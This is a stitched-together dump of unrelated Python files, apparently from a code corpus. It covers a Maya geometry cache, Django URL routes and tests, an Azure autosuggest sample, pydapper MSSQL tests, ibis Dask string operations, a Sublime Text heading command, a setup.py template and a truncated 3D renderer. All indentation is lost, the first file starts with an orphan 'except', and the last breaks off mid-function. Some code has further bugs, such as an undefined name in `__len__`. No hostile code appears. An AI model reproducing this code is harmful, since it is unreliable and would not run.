from scipy.spatial import cKDTree as kd_tree
except ImportError:
from scipy.spatial import cKDTree as kd_tree
import maya.OpenMaya as om
import logging_util
# import progress_bar
class GeoCache(object):
"""
container for cached triangulated geometry
note: no extra type checking or error handling is done!
"""
def __init__(self):
log_lvl = sys._global_spore_dispatcher.spore_globals['LOG_LEVEL']
self.logger = logging_util.SporeLogger(__name__, log_lvl)
self.p0 = om.MPointArray()
self.p1 = om.MPointArray()
self.p2 = om.MPointArray()
self.normals = om.MVectorArray()
self.poly_id = om.MIntArray()
self.AB = om.MVectorArray()
self.AC = om.MVectorArray()
self.poly_verts = om.MPointArray()
self.uv_kd_tree = None
self.neighbor_lookup = {}
self.mesh = None
self.cached = True
self.weighted_ids = []
# @progress_bar.ProgressBar('Caching Geometry...')
def cache_geometry(self, mesh):
""" cache the given geometry
:param mesh: the mesh which will be cached
:type mesh: MDagPath to the mesh """
self.flush_cache()
self.mesh = mesh
self.logger.debug('Cache geometry: {}'.format(mesh.fullPathName())) # TODO - get node name
# in_mesh = node_utils.get_connected_in_mesh(self.thisMObject(), False)
mesh_fn = om.MFnMesh(self.mesh)
# num_polys = mesh_fn.numPolygons() # TODO - get in mesh fn
# num_iter = num_polys / 100
# store ferts for validating the cache later
mesh_fn.getPoints(self.poly_verts)
# get bb in world space
dag_fn = om.MFnDagNode(self.mesh)
bb = dag_fn.boundingBox()
inv_matrix = self.mesh.exclusiveMatrix()
bb.transformUsing(inv_matrix)
# initialize triangle data
tri_points = om.MPointArray()
vert_ids = om.MIntArray()
tris_area = []
smallest_tri = None
# iter mesh
poly_iter = om.MItMeshPolygon(self.mesh)
while not poly_iter.isDone():
# get face triangles
poly_index = poly_iter.index()
poly_iter.getTriangles(tri_points, vert_ids, om.MSpace.kWorld)
# get triangle data
for i in xrange(tri_points.length() / 3):
p0 = tri_points[i * 3]
p1 = tri_points[i * 3 + 1]
p2 = tri_points[i * 3 + 2]
area, AB, AC, normal = self.get_triangle_area(p0, p1, p2)
if area < smallest_tri or smallest_tri is None:
smallest_tri = area
tris_area.append(area)
self.cache = (p0, p1, p2, normal, poly_index, AB, AC)
# update progressbar
# if poly_index >= num_iter:
# self.cache_geometry.increment()
# num_iter += num_polys / 100
poly_iter.next()
probability = [int(math.ceil(area / smallest_tri)) for area in tris_area]
[self.weighted_ids.extend([idx] * chance) for idx, chance in enumerate(probability)]
self.cached = True
def get_triangle_area(self, p0, p1, p2):
"""
return size of a triangle and the vector p1-p0 and p2-p0
:param p0: MPoint 1
:param p1: MPoint 2
:param p2: MPoint 3
:return: triangle area, vector AB, vector AC, and the normalized triangle normal
"""
AB = om.MVector(p1 - p0)
AC = om.MVector(p2 - p0)
normal = (AB ^ AC)
# actually the real surface area is area/2
# but since all tris are handled the same way it does not make any difference
# hence I can save computation by omitting area/2
area = math.sqrt(normal[0] ** 2 + normal[1] ** 2 + normal[2] ** 2)
normal.normalize()
return area, AB, AC, normal
def create_uv_lookup(self):
""" create a dict with an entry for every vertex and a list of
neighbouring faces as well as a kd tree tro look up close face ids """
self.logger.debug('Create UV lookup for the current GeoCache')
util = om.MScriptUtil()
connected_faces = om.MIntArray()
mesh_fn = om.MFnMesh(self.mesh)
num_verts = mesh_fn.numVertices()
points = np.zeros(shape=(num_verts, 2))
vert_iter = om.MItMeshVertex(self.mesh)
while not vert_iter.isDone():
index = vert_iter.index()
vert_iter.getConnectedFaces(connected_faces)
self.neighbor_lookup[index] = [connected_faces[i] for i in xrange(connected_faces.length())]
util.createFromDouble(0.0, 0.0)
uv_ptr = util.asFloat2Ptr()
vert_iter.getUV(uv_ptr)
u_coord = util.getFloat2ArrayItem(uv_ptr, 0, 0)
v_coord = util.getFloat2ArrayItem(uv_ptr, 0, 1)
points[index] = (u_coord, v_coord)
vert_iter.next()
self.uv_kd_tree = kd_tree(points)
def get_close_face_ids(self, u_coord, v_coord):
""" get a list of neighbour face ids to the give u and v coords """
distance, index = self.uv_kd_tree.query((u_coord, v_coord), 1)
return self.neighbor_lookup[index]
def validate_cache(self):
""" check if the current cache is valid """
points = om.MPointArray()
mesh_fn = om.MFnMesh(self.mesh)
mesh_fn.getPoints(points)
if points.length() != self.poly_verts.length():
self.logger.debug('Validate GeoCache succeded')
return False
for i in xrange(points.length()):
if points[i] != self.poly_verts[i]:
self.logger.debug('Validate GeoCache failed')
return False
return True
"""
index = 0
tri_points = om.MPointArray()
tri_ids = om.MIntArray()
poly_iter = om.MItMeshPolygon(self.mesh)
while not poly_iter.isDone():
# get face triangles
poly_index = poly_iter.index()
poly_iter.getTriangles(tri_points, tri_ids, om.MSpace.kWorld)
# get triangle data
for i in xrange(tri_points.length() / 3):
# assert self.p0[i * 3] == tri_points[i * 3]
# assert self.p1[i * 3 + 1] == tri_points[i * 3 + 1]
# assert self.p2[i * 3 + 2] == tri_points[i * 3 + 2]
print self.p0[i*3].x, tri_points[i*3].x
print self.p0[i*3].y, tri_points[i*3].y
print self.p0[i*3].z, tri_points[i*3].z
print '-'
print self.p0[i*3+1].x, tri_points[i*3+1].x
print self.p0[i*3+1].y, tri_points[i*3+1].y
print self.p0[i*3+1].z, tri_points[i*3+1].z
print '-'
print self.p0[i*3+2].x, tri_points[i*3+2].x
print self.p0[i*3+2].y, tri_points[i*3+2].y
print self.p0[i*3+2].z, tri_points[i*3+2].z
# except AssertionError:
# return False
index += 1
poly_iter.next()
return True
"""
################################################################################################
# cache property
################################################################################################
@property
def cache(self):
""" cache getter
:return: tuple of entire geo cache:
id content data type
0 - p0 - MPointArray
1 - p2 - MPointArray
2 - p1 - MPointArray
3 - face normal - MVectorArray
4 - polygon id - MIntArray
5 - vector AB - MVectorArray
6 - vector AC - MvectorArray
"""
return self.p0,\
self.p1,\
self.p2,\
self.normals,\
self.poly_id,\
self.AB,\
self.AC
@cache.setter
def cache(self, triangle):
""" cache setter
append one triangle to the end of the current cache
:param triangle: argument must be of type tuple or list
it must consist of the following items in the exact same order:
id content data type
0 - p0 - MPointArray
1 - p2 - MPointArray
2 - p1 - MPointArray
3 - face normal - MVectorArray
4 - polygon id - MIntArray
5 - vector AB - MVectorArray
6 - vector AC - MvectorArray
note: no error or type checking is done!
"""
self.p0.append(triangle[0])
self.p1.append(triangle[1])
self.p2.append(triangle[2])
self.normals.append(triangle[3])
self.poly_id.append(int(triangle[4]))
self.AB.append(triangle[5])
self.AC.append(triangle[6])
def flush_cache(self):
self.logger.debug('Flush GeoCache')
self.p0 = om.MPointArray()
self.p1 = om.MPointArray()
self.p2 = om.MPointArray()
self.normals = om.MVectorArray()
self.poly_id = om.MIntArray()
self.AB = om.MVectorArray()
self.AC = om.MVectorArray()
self.cached = False
def __len__(self):
return p0.length()
|
1708929
|
from django.conf.urls import patterns, include, url
urlpatterns = patterns('exam.views',
url(r'^$', 'index'),
url(r'^login/$', 'user_login'),
url(r'^quizzes/$','quizlist_user'),
url(r'^results/$','results_user'),
url(r'^start/$', 'start'),
url(r'^start/(?P<questionpaper_id>\d+)/$','start'),
url(r'^quit/(?P<questionpaper_id>\d+)/$', 'quit'),
url(r'^intro/(?P<questionpaper_id>\d+)/$','intro'),
url(r'^complete/$', 'complete'),
url(r'^complete/(?P<questionpaper_id>\d+)/$', 'complete'),
url(r'^register/$', 'user_register'),
url(r'^(?P<q_id>\d+)/$', 'question'),
url(r'^(?P<q_id>\d+)/check/$', 'check'),
url(r'^(?P<q_id>\d+)/check/(?P<questionpaper_id>\d+)/$', 'check'),
url(r'^intro/$', 'start'),
url(r'^manage/$', 'prof_manage'),
url(r'^manage/addquestion/$', 'add_question'),
url(r'^manage/addquestion/(?P<question_id>\d+)/$', 'add_question'),
url(r'^manage/addquiz/$', 'add_quiz'),
url(r'^manage/editquiz/$', 'edit_quiz'),
url(r'^manage/editquestion/$', 'edit_question'),
url(r'^manage/addquiz/(?P<quiz_id>\d+)/$', 'add_quiz'),
url(r'^manage/gradeuser/$', 'show_all_users'),
url(r'^manage/gradeuser/(?P<username>[a-zA-Z0-9_.]+)/$', 'grade_user'),
url(r'^manage/questions/$', 'show_all_questions'),
url(r'^manage/showquiz/$','show_all_quiz'),
url(r'^manage/monitor/$', 'monitor'),
url(r'^manage/showquestionpapers/$','show_all_questionpapers'),
url(r'^manage/showquestionpapers/(?P<questionpaper_id>\d+)/$',\
'show_all_questionpapers'),
url(r'^manage/monitor/(?P<questionpaper_id>\d+)/$', 'monitor'),
url(r'^manage/user_data/(?P<username>[a-zA-Z0-9_.]+)/$','user_data'),
url(r'^manage/designquestionpaper/$','design_questionpaper'),
url(r'^manage/designquestionpaper/(?P<questionpaper_id>\d+)/$',\
'design_questionpaper'),
url(r'^manage/designquestionpaper/automatic/(?P<questionpaper_id>\d+)/$',\
'automatic_questionpaper'),
url(r'^manage/designquestionpaper/automatic$','automatic_questionpaper'),
url(r'^manage/designquestionpaper/manual$','manual_questionpaper'),
url(r'^manage/designquestionpaper/manual/(?P<questionpaper_id>\d+)/$',\
'manual_questionpaper'),
url(r'^ajax/questionpaper/(?P<query>.+)/$', 'ajax_questionpaper'),
)
|
1708984
|
from wrapper import *
from goto import *
@with_goto
def all_code():
clear_all_execution()
exec_sql('CREATE DATABASE IF NOT EXISTS test;')
exec_sql('USE test;')
exec_sql(
'create table tbcalifica'
'( iditem integer not null primary key,'
'item varchar(150) not null,'
'puntos float not null );'
)
exec_sql('insert into tbcalifica(iditem, item, puntos) values (1,\'Funcionalidades básicas\',2.0);')
t1 = 1 + 1
exec_sql(f'insert into tbcalifica(iditem, item, puntos) values ({t1},\'Funcionalidades X\',3.0);')
exec_sql(f'insert into tbcalifica(iditem, item, puntos) values (3*2,\'Funcionalidades Meh\',4.0);')
result = []
i = 1
stop = 5
label.begin
if i == stop:
goto.end
result.append(i)
i += 1
goto.begin
label.end
print(result)
all_code()
report_stored_st()
|
1708987
|
from django.test import TestCase
from . import country
class TestCountry(TestCase):
def test_activate_deactivate_country(self):
self.assertIsNone(country.get_country())
country.activate('us')
self.assertEqual(country.get_country(), 'us')
country.activate('ca')
self.assertEqual(country.get_country(), 'ca')
country.deactivate()
self.assertIsNone(country.get_country())
def test_activate_checks_country(self):
with self.assertRaises(ValueError):
country.activate(None)
with self.assertRaises(ValueError):
country.activate('br')
self.assertIsNone(country.get_country())
def test_override_country(self):
self.assertIsNone(country.get_country())
with country.override('us'):
self.assertEqual(country.get_country(), 'us')
with country.override('ca'):
self.assertEqual(country.get_country(), 'ca')
self.assertEqual(country.get_country(), 'us')
self.assertIsNone(country.get_country())
|
1708995
|
import os
from azure.cognitiveservices.search.autosuggest import AutoSuggestClient
from msrest.authentication import CognitiveServicesCredentials
'''
Microsoft Azure Cognitive Services - Bing Autosuggest - Get Search Suggestions
Uses the general Cognitive Services key/endpoint. It's used when you want to
combine many Cognitive Services with just one authentication key/endpoint.
Services are not combined here, but could be potentially.
Install the Cognitive Services Bing Autosuggest SDK module:
python -m pip install azure-cognitiveservices-search_autosuggest
Use Python 3.4+
'''
subscription_key = "PASTE_YOUR_AUTO_SUGGEST_SUBSCRIPTION_KEY_HERE"
endpoint = "PASTE_YOUR_AUTO_SUGGEST_ENDPOINT_HERE"
'''
AUTHENTICATE
Create an Autosuggest client.
'''
credentials = CognitiveServicesCredentials(subscription_key)
autosuggest_client = AutoSuggestClient(endpoint, CognitiveServicesCredentials(subscription_key))
'''
AUTOSUGGEST
This example uses a query term to search for autocompletion suggestions for the term.
'''
# Returns from the Suggestions class
result = autosuggest_client.auto_suggest('sail')
# Access all suggestions
suggestions = result.suggestion_groups[0]
# print results
for suggestion in suggestions.search_suggestions:
print(suggestion.query)
print(suggestion.display_text)
|
1709003
|
from cospar.tool._clone import *
from cospar.tool._gene import *
from cospar.tool._map import *
from cospar.tool._utils import *
|
1709055
|
import datetime
from decimal import Decimal
import pytest
from pymssql import _pymssql
from pydapper import connect
from pydapper import using
from pydapper.mssql.pymssql import PymssqlCommands
from tests.suites.commands import ExecuteScalarTestSuite
from tests.suites.commands import ExecuteTestSuite
from tests.suites.commands import QueryFirstOrDefaultTestSuite
from tests.suites.commands import QueryFirstTestSuite
from tests.suites.commands import QueryMultipleTestSuite
from tests.suites.commands import QuerySingleOrDefaultTestSuite
from tests.suites.commands import QuerySingleTestSuite
from tests.suites.commands import QueryTestSuite
@pytest.fixture(scope="function")
def commands(server, database_name) -> PymssqlCommands:
with PymssqlCommands(
_pymssql.connect(server=server, port=1434, password="<PASSWORD>", user="sa", database=database_name)
) as commands:
yield commands
def test_using(server, database_name):
with using(
_pymssql.connect(server=server, port=1434, password="<PASSWORD>", user="sa", database=database_name)
) as commands:
assert isinstance(commands, PymssqlCommands)
@pytest.mark.parametrize("driver", ["mssql", "mysql+pymssql"])
def test_connect(driver, database_name, server):
with connect(f"{driver}://sa:pydapper!PYDAPPER@{server}:1434/{database_name}") as commands:
assert isinstance(commands, PymssqlCommands)
class TestParamHandler:
@pytest.mark.parametrize(
"param, expected",
[
({"test": 1}, "%d"),
({"test": Decimal("5.6750000")}, "%d"),
({"test": datetime.date.today()}, "%s"),
([{"test": datetime.date.today()}, {"test": datetime.datetime.today()}], "%s"),
],
)
def test_get_param_value(self, param, expected):
handler = PymssqlCommands.SqlParamHandler("", param)
assert handler.get_param_placeholder("test") == expected
class TestExecute(ExecuteTestSuite):
...
class TestQuery(QueryTestSuite):
...
class TestQueryMultiple(QueryMultipleTestSuite):
...
class TestQueryFirst(QueryFirstTestSuite):
...
class TestQueryFirstOrDefault(QueryFirstOrDefaultTestSuite):
...
class TestQuerySingle(QuerySingleTestSuite):
...
class TestQuerySingleOrDefault(QuerySingleOrDefaultTestSuite):
...
class TestExecuteScalar(ExecuteScalarTestSuite):
...
|
1709058
|
import itertools
import dask.dataframe as dd
import dask.dataframe.groupby as ddgb
import numpy as np
import pandas
import toolz
from pandas import isnull
import ibis
import ibis.expr.operations as ops
from ibis.backends.pandas.core import integer_types, scalar_types
from ibis.backends.pandas.execution.strings import (
execute_series_join_scalar_sep,
execute_series_regex_extract,
execute_series_regex_replace,
execute_series_regex_search,
execute_series_right,
execute_series_translate_scalar_scalar,
execute_series_translate_scalar_series,
execute_series_translate_series_scalar,
execute_series_translate_series_series,
execute_string_capitalize,
execute_string_contains,
execute_string_length_series,
execute_string_like_series_string,
execute_string_lower,
execute_string_lpad,
execute_string_lstrip,
execute_string_repeat,
execute_string_reverse,
execute_string_rpad,
execute_string_rstrip,
execute_string_strip,
execute_string_upper,
execute_substring_int_int,
haystack_to_series_of_lists,
)
from ..dispatch import execute_node
from .util import (
TypeRegistrationDict,
make_selected_obj,
register_types_to_dispatcher,
)
DASK_DISPATCH_TYPES: TypeRegistrationDict = {
ops.StringLength: [((dd.Series,), execute_string_length_series)],
ops.Substring: [
(
(
dd.Series,
integer_types,
integer_types,
),
execute_substring_int_int,
),
],
ops.Strip: [((dd.Series,), execute_string_strip)],
ops.LStrip: [((dd.Series,), execute_string_lstrip)],
ops.RStrip: [((dd.Series,), execute_string_rstrip)],
ops.LPad: [
(
(
dd.Series,
(dd.Series,) + integer_types,
(dd.Series, str),
),
execute_string_lpad,
),
],
ops.RPad: [
(
(
dd.Series,
(dd.Series,) + integer_types,
(dd.Series, str),
),
execute_string_rpad,
),
],
ops.Reverse: [((dd.Series,), execute_string_reverse)],
ops.Lowercase: [((dd.Series,), execute_string_lower)],
ops.Uppercase: [((dd.Series,), execute_string_upper)],
ops.Capitalize: [((dd.Series,), execute_string_capitalize)],
ops.Repeat: [
((dd.Series, (dd.Series,) + integer_types), execute_string_repeat),
],
ops.StringFind: [
(
(
dd.Series,
(dd.Series, str),
(dd.Series, type(None)) + integer_types,
(dd.Series, type(None)) + integer_types,
),
execute_string_contains,
)
],
ops.StringSQLLike: [
(
(
dd.Series,
str,
(str, type(None)),
),
execute_string_like_series_string,
),
],
ops.RegexSearch: [
(
(
dd.Series,
str,
),
execute_series_regex_search,
)
],
ops.RegexExtract: [
(
(dd.Series, (dd.Series, str), integer_types),
execute_series_regex_extract,
),
],
ops.RegexReplace: [
(
(
dd.Series,
str,
str,
),
execute_series_regex_replace,
),
],
ops.Translate: [
(
(dd.Series, dd.Series, dd.Series),
execute_series_translate_series_series,
),
((dd.Series, dd.Series, str), execute_series_translate_series_scalar),
((dd.Series, str, dd.Series), execute_series_translate_scalar_series),
((dd.Series, str, str), execute_series_translate_scalar_scalar),
],
ops.StrRight: [((dd.Series, integer_types), execute_series_right)],
ops.StringJoin: [
(((dd.Series, str), list), execute_series_join_scalar_sep),
],
}
register_types_to_dispatcher(execute_node, DASK_DISPATCH_TYPES)
@execute_node.register(ops.Substring, dd.Series, dd.Series, integer_types)
def execute_substring_series_int(op, data, start, length, **kwargs):
return execute_substring_series_series(
op, data, start, dd.from_array(np.repeat(length, len(start))), **kwargs
)
@execute_node.register(ops.Substring, dd.Series, integer_types, dd.Series)
def execute_string_substring_int_series(op, data, start, length, **kwargs):
return execute_substring_series_series(
op,
data,
dd.from_array(np.repeat(start, len(length))),
length,
**kwargs,
)
# TODO - substring - #2553
@execute_node.register(ops.Substring, dd.Series, dd.Series, dd.Series)
def execute_substring_series_series(op, data, start, length, **kwargs):
end = start + length
# TODO - this is broken
def iterate(
value,
start_iter=start.iteritems(),
end_iter=end.iteritems(),
):
_, begin = next(start_iter)
_, end = next(end_iter)
if (begin is not None and isnull(begin)) or (
end is not None and isnull(end)
):
return None
return value[begin:end]
return data.map(iterate)
@execute_node.register(ops.StringSQLLike, ddgb.SeriesGroupBy, str, str)
def execute_string_like_series_groupby_string(
op, data, pattern, escape, **kwargs
):
return execute_string_like_series_string(
op, make_selected_obj(data), pattern, escape, **kwargs
).groupby(data.grouper.groupings)
# TODO - aggregations - #2553
@execute_node.register(
ops.GroupConcat, dd.Series, str, (dd.Series, type(None))
)
def execute_group_concat_series_mask(
op, data, sep, mask, aggcontext=None, **kwargs
):
return aggcontext.agg(
data[mask] if mask is not None else data,
lambda series, sep=sep: sep.join(series.values),
)
@execute_node.register(ops.GroupConcat, ddgb.SeriesGroupBy, str, type(None))
def execute_group_concat_series_gb(
op, data, sep, _, aggcontext=None, **kwargs
):
custom_group_concat = dd.Aggregation(
name='custom_group_concat',
chunk=lambda s: s.apply(list),
agg=lambda s0: s0.apply(
lambda chunks: sep.join(
str(s) for s in itertools.chain.from_iterable(chunks)
)
),
)
return data.agg(custom_group_concat)
# TODO - aggregations - #2553
@execute_node.register(
ops.GroupConcat, ddgb.SeriesGroupBy, str, ddgb.SeriesGroupBy
)
def execute_group_concat_series_gb_mask(
op, data, sep, mask, aggcontext=None, **kwargs
):
def method(series, sep=sep):
return sep.join(series.values.astype(str))
return aggcontext.agg(
data,
lambda data, mask=mask.obj, method=method: method(
data[mask[data.index]]
),
)
@execute_node.register(ops.StringAscii, dd.Series)
def execute_string_ascii(op, data, **kwargs):
output_meta = pandas.Series([], dtype=np.dtype('int32'), name=data.name)
return data.map(ord, meta=output_meta)
@execute_node.register(ops.StringAscii, ddgb.SeriesGroupBy)
def execute_string_ascii_group_by(op, data, **kwargs):
return execute_string_ascii(op, make_selected_obj(data), **kwargs).groupby(
data.index
)
@execute_node.register(ops.RegexSearch, ddgb.SeriesGroupBy, str)
def execute_series_regex_search_gb(op, data, pattern, **kwargs):
return execute_series_regex_search(
op,
make_selected_obj(data),
getattr(pattern, 'obj', pattern),
**kwargs,
).groupby(data.index)
@execute_node.register(
ops.RegexExtract, ddgb.SeriesGroupBy, str, integer_types
)
def execute_series_regex_extract_gb(op, data, pattern, index, **kwargs):
return execute_series_regex_extract(
op, make_selected_obj(data), pattern, index, **kwargs
).groupby(data.index)
@execute_node.register(ops.RegexReplace, ddgb.SeriesGroupBy, str, str)
def execute_series_regex_replace_gb(op, data, pattern, replacement, **kwargs):
return execute_series_regex_replace(
make_selected_obj(data), pattern, replacement, **kwargs
).groupby(data.index)
@execute_node.register(ops.StrRight, ddgb.SeriesGroupBy, integer_types)
def execute_series_right_gb(op, data, nchars, **kwargs):
return execute_series_right(op, make_selected_obj(data), nchars).groupby(
data.index
)
def haystack_to_dask_series_of_lists(haystack, index=None):
pieces = haystack_to_series_of_lists(haystack, index)
return dd.from_pandas(pieces, npartitions=1)
@execute_node.register(ops.FindInSet, dd.Series, list)
def execute_series_find_in_set(op, needle, haystack, **kwargs):
def find_in_set(index, elements):
return ibis.util.safe_index(elements, index)
return needle.apply(find_in_set, args=(haystack,))
@execute_node.register(ops.FindInSet, ddgb.SeriesGroupBy, list)
def execute_series_group_by_find_in_set(op, needle, haystack, **kwargs):
pieces = [getattr(piece, 'obj', piece) for piece in haystack]
return execute_series_find_in_set(
op, make_selected_obj(needle), pieces, **kwargs
).groupby(needle.index)
# TODO we need this version not pandas
@execute_node.register(ops.FindInSet, scalar_types, list)
def execute_string_group_by_find_in_set(op, needle, haystack, **kwargs):
# `list` could contain series, series groupbys, or scalars
# mixing series and series groupbys is not allowed
series_in_haystack = [
type(piece)
for piece in haystack
if isinstance(piece, (dd.Series, ddgb.SeriesGroupBy))
]
if not series_in_haystack:
return ibis.util.safe_index(haystack, needle)
try:
(collection_type,) = frozenset(map(type, series_in_haystack))
except ValueError:
raise ValueError('Mixing Series and ddgb.SeriesGroupBy is not allowed')
pieces = haystack_to_dask_series_of_lists(
[getattr(piece, 'obj', piece) for piece in haystack]
)
result = pieces.map(toolz.flip(ibis.util.safe_index)(needle))
if issubclass(collection_type, dd.Series):
return result
assert issubclass(collection_type, ddgb.SeriesGroupBy)
return result.groupby(
toolz.first(
piece.grouper.groupings
for piece in haystack
if hasattr(piece, 'grouper')
)
)
|
1709064
|
import os
import random
listdir = os.listdir('/media/dsg3/datasets/SIXray/Annotation')
test = random.sample(listdir, 200)
train = [x for x in listdir if x not in test]
with open('dataset-train.txt', 'w') as f:
for item in train:
f.writelines('{0}\n'.format(os.path.splitext(item)[0]))
with open('dataset-test.txt', 'w') as f:
for item in test:
f.writelines('{0}\n'.format(os.path.splitext(item)[0]))
|
1709072
|
import re
import sublime
from ..logging import logger
from ..view import MdeTextCommand
class MdeChangeHeadingsLevelCommand(MdeTextCommand):
"""
The `mde_change_headings_level` command modifies headings levels to an
absolute or by a relative value.
1. Carets are moved to the beginning of each header label.
2. Indentation level is kept intact.
3. Works within block quotes.
4. Respects `mde.match_heading_hashes` setting.
Absolute:
```json
{ "command": "mde_change_headings_level", "args": {"to": 2, "select": false} }
```
Relative
```json
{ "command": "mde_change_headings_level", "args": {"by": -1, "select": false} }
```
"""
MAX_LEVEL = 6
def description(self):
# Used as the name for Undo.
return "Change Headings Level"
def run(self, edit, to=None, by=None, select=False):
"""
Execute `mde_change_headings_level`
:param edit: The edit token
:type edit: sublime.Edit
:param to: target heading level
:type to: int
:param by: increment to change heading level by
:type by: int
:param select: whether to select heading text or not
:type select: bool
"""
if by is not None:
try:
by = int(by)
except (TypeError, ValueError):
logger.error("Invalid headings level step size specified!")
return
def calc_level(level):
return (level + by) % (self.MAX_LEVEL + 1)
self._set_level(edit, calc_level, select)
elif to is not None:
try:
to = max(0, min(self.MAX_LEVEL, int(to)))
except (TypeError, ValueError):
logger.error("Invalid headings level specified!")
return
def calc_level(level):
return to
self._set_level(edit, calc_level, select)
else:
logger.error("No headings level specified!")
def _set_level(self, edit, calc_level, select):
view = self.view
match_heading_hashes = view.settings().get("mde.match_heading_hashes")
pattern = re.compile(
r"""
(?x)
^([ \t>]*) # block quotes
(?:
(\#+) # leading hashes
(?: # optionally followed by ...
[ \t]+? # at least one space
( .*? ) # tokens not looking like trailing hashes
([ \t]+\#+[ \t]*$)? # maybe trailing hashes
)?
|
([^-+*].*?)? [ \t]* # no heading nor list item
)
$
"""
)
# One or more selections may span multiple lines each of them to change heading level for.
# To correctly handle caret placements split all selections into single lines first.
vsels = view.sel()
regions = [region for sel in vsels for region in view.split_by_newlines(sel)]
vsels.clear()
vsels.add_all(regions)
regions = []
for sel in vsels:
line = view.line(sel)
string = view.substr(line)
match = pattern.match(string)
if not match:
logger.debug(
"Change heading level ignored line %d: '%s'",
view.rowcol(line.a)[0] + 1,
string,
)
continue
bol = line.begin()
col = view.rowcol(sel.begin())[1]
quote, _, heading, _, text = match.groups()
old_level = match.end(2) - match.start(2)
new_level = calc_level(old_level)
leading = "#" * new_level + " " * bool(new_level)
heading = heading or text or ""
new_string = quote + leading + heading
if match_heading_hashes and new_level:
new_string += " " + "#" * new_level
view.replace(edit, line, new_string)
# convert to heading
if old_level < 1:
pt = bol + col + len(leading)
# caret was in front of heading
elif col <= match.end(1):
pt = bol + col
# caret after heading text
elif col > match.end(3):
pt = bol + len(leading) + len(heading)
# keep caret in relative horizontal position
else:
pt = bol + col + len(leading) - max(0, match.start(3) - match.start(2))
pt = min(max(bol, pt), view.line(bol).end())
regions.append(sublime.Region(pt, pt))
vsels.clear()
vsels.add_all(regions)
|
1709080
|
import os
from setuptools import setup, find_packages
def read(fname):
try:
with open(os.path.join(os.path.dirname(__file__), fname)) as fh:
return fh.read()
except IOError:
return ''
requirements = read('REQUIREMENTS').splitlines()
tests_requirements = read('REQUIREMENTS-TESTS').splitlines()
setup(
name="{{ package_name }}",
version="0.0.1",
description="",
long_description=read('README.rst'),
url='',
license='{{ license.name }}',
author='{{ author.name }}',
author_email='{{ author.email }}',
packages=find_packages(exclude=['tests']),
include_package_data=True,
classifiers=[
'Development Status :: 3 - Alpha',{{#license.classifier}}
'{{ license.classifier }}',{{/license.classifier}}
'Programming Language :: Python',
],
install_requires=requirements,
tests_require=tests_requirements,
)
|
1709101
|
from functools import wraps
from primehub.utils import reject_action
from primehub.utils.decorators import __requires_permission__, logger, __command_groups__
def has_permission_flag(cmd_args: dict):
k = "{}.{}".format(cmd_args['module'], cmd_args['func'])
if k in __requires_permission__:
return True
return False
def disable_reject_action(action):
logger.debug('@ask_for_permission is disable, the action will pass %s', action)
reject_action_function = disable_reject_action
def enable_ask_for_permission_feature():
global reject_action_function
reject_action_function = reject_action
def ask_for_permission(func):
k = "{}.{}".format(func.__module__, func.__name__)
__requires_permission__[k] = ""
@wraps(func)
def wrapper(*args, **kwargs):
if not kwargs.get('--yes-i-really-mean-it', False):
cmd_args = None
try:
actions = __command_groups__[func.__module__]
cmd_args = [x for x in actions if x['func'] == func.__name__]
except BaseException:
pass
if cmd_args:
reject_action_function(cmd_args[0]['name'])
else:
reject_action_function(func.__name__)
return func(*args, **kwargs)
return wrapper
|
1709103
|
import torch
import numpy as np
from tqdm import tqdm
import time
from PIL import Image
import os
from im2mesh.common import (
arange_pixels, transform_to_camera_space)
class Renderer(object):
''' Render class for DVR.
It provides functions to render the representation.
Args:
model (nn.Module): trained DVR model
threshold (float): threshold value
device (device): pytorch device
colors (string): which type of color to use (default: rgb)
resolution (tuple): output resolution
n_views (int): number of views to generate
extension (string): output image extension
background (string): which background color to use
ray_sampling_accuracy (tuple): how many evaluations should be
performed on the ray
n_start_view (int): at which item in the batch the rendering
process should be started
'''
def __init__(self, model, threshold=0.5, device=None, colors='rgb',
resolution=(128, 128), n_views=3, extension='png',
background='white', ray_sampling_accuracy=[1024, 1025],
n_start_view=0):
self.model = model.to(device)
self.threshold = threshold
self.device = device
self.colors = colors
self.n_views = n_views
self.extension = extension
self.resolution = resolution
self.sampling_accuracy = ray_sampling_accuracy
self.n_start_view = n_start_view
if background == 'white':
self.background = 1.
elif background == 'black':
self.background = 0.
else:
self.background = 0.
def render_and_export(self, data, img_out_path, modelname='model0',
return_stats=True):
''' Renders and exports for provided camera information in data.
Args:
data (tensor): data tensor
img_out_path (string): output path
modelname (string): name of the model
return_stats (bool): whether stats should be returned
'''
self.model.eval()
device = self.device
stats_dict = {}
inputs = data.get('inputs', torch.empty(1, 0)).to(device)
with torch.no_grad():
c = self.model.encode_inputs(inputs)
if not os.path.exists(img_out_path):
os.makedirs(img_out_path)
out_imgs = []
for i in tqdm(range(self.n_start_view,
self.n_start_view + self.n_views)):
datai = data.get('img.img%d' % i, None)
if datai is None:
print('No image %d found.' % i)
break
img = datai[None]
batch_size, _, h, w = img.shape
assert(batch_size == 1)
world_mat = datai.get('world_mat').to(device)
camera_mat = datai.get('camera_mat').to(device)
scale_mat = datai.get('scale_mat').to(device)
t0 = time.time()
with torch.no_grad():
img_pred = self.render_img(
camera_mat, world_mat, inputs, scale_mat, c, stats_dict,
resolution=self.resolution)
stats_dict['time_render'] = time.time() - t0
img_pred.save(os.path.join(
img_out_path, '%s_%03d.%s' % (modelname, i, self.extension)))
out_imgs.append(img_pred)
return inputs.cpu(), out_imgs, stats_dict
def render_img(self, camera_mat, world_mat, inputs, scale_mat=None,
c=None, stats_dict={}, resolution=(128, 128)):
''' Renders an image for provided camera information.
Args:
camera_mat (tensor): camera matrix
world_mat (tensor): world matrix
scale_mat (tensor): scale matrix
c (tensor): latent conditioned code c
stats_dict (dict): statistics dictionary
resolution (tuple): output image resolution
'''
device = self.device
h, w = resolution
t0 = time.time()
p_loc, pixels = arange_pixels(resolution=(h, w))
pixels = pixels.to(device)
stats_dict['time_prepare_points'] = time.time() - t0
if self.colors in ('rgb', 'depth'):
# Get predicted world points
with torch.no_grad():
t0 = time.time()
p_world_hat, mask_pred, mask_zero_occupied = \
self.model.pixels_to_world(
pixels, camera_mat, world_mat, scale_mat, c,
sampling_accuracy=self.sampling_accuracy)
stats_dict['time_eval_depth'] = time.time() - t0
t0 = time.time()
p_loc = p_loc[mask_pred]
with torch.no_grad():
if self.colors == 'rgb':
img_out = (255 * np.ones((h, w, 3))).astype(np.uint8)
t0 = time.time()
if mask_pred.sum() > 0:
rgb_hat = self.model.decode_color(p_world_hat, c=c)
rgb_hat = rgb_hat[mask_pred].cpu().numpy()
rgb_hat = (rgb_hat * 255).astype(np.uint8)
img_out[p_loc[:, 1], p_loc[:, 0]] = rgb_hat
